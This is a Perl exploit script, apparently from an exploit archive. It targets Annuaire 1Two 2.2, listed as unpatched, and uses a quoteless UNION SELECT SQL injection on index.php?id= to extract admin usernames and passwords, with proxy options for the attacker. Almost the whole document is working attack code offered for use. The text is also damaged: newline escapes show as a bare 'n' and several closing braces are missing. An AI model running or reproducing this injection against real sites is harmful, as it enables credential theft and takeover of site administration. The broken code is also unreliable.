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Annuaire 1Two 2.2 Remote SQL Injection Exploit

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# Affected.scr..: Annuaire 1Two 2.2
# Poc.ID........: 09060902.txt
# Type..........: SQL Injection (without quote)
# Risk.level....: Medium
# Vendor.Status.: Unpatched
# Src.download..: [url]http://www.1two.org/[/url]
# Poc.link......: acid-root.new.fr/poc/09060902.txt
# Credits.......: DarkFig
use LWP::UserAgent;
use HTTP::Request;
use Getopt::Long;
use strict;

print STDOUT "n+", '-' x 53, "+n";
print STDOUT "| Annuaire 1Two 2.2 Remote SQL Injection Exploit |n";
print STDOUT '+', '-' x 53, "+n";

my $opt = GetOptions(
'host=s' => $host,
'path=s' => $path,
'proxh=s' => $proxh,
'proxu=s' => $proxu,
'proxp=s' => $proxp);

if(!$host) {
print STDOUT "| Usage: ./xx.pl --host=[www] --path=[/] [Options] |n";
print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |n";
print STDOUT '+', '-' x 53, "+n";

if(!$path) {$path = '/';}
if($host !~ /http/) {$host = 'http://'.$host;}
if($proxh !~ /http/ && $proxh != '') {$proxh = 'http://'.$proxh.'/';}

my @fi = ('username', 'password');
my $ur = $host.$path.'index.php?id=';
my $ua = LWP::UserAgent->new();
$ua->agent('Mozilla XD');
$ua->proxy(['http'] => $proxh) if $proxh;

foreach(@fi) {
my $xx = $_;
my $re = HTTP::Request->new(GET => $ur."-1 UNION SELECT $xx FROM 1two_annuaire_admin");
$re->proxy_authorization_basic($proxu, $proxp) if $proxp;
my $xd = $ua->request($re);
my $da = $xd->content;

if($da =~ /- (.*?)</title>/) {
if($xx eq 'username') {
print STDOUT " [+]User:";}
if($xx eq 'password') {
print STDOUT " [+]Passwd:";}
print STDOUT " $1n";
} else {
print STDOUT "[!]Exploit failedn";
print STDOUT "+", '-' x 53, "+n";

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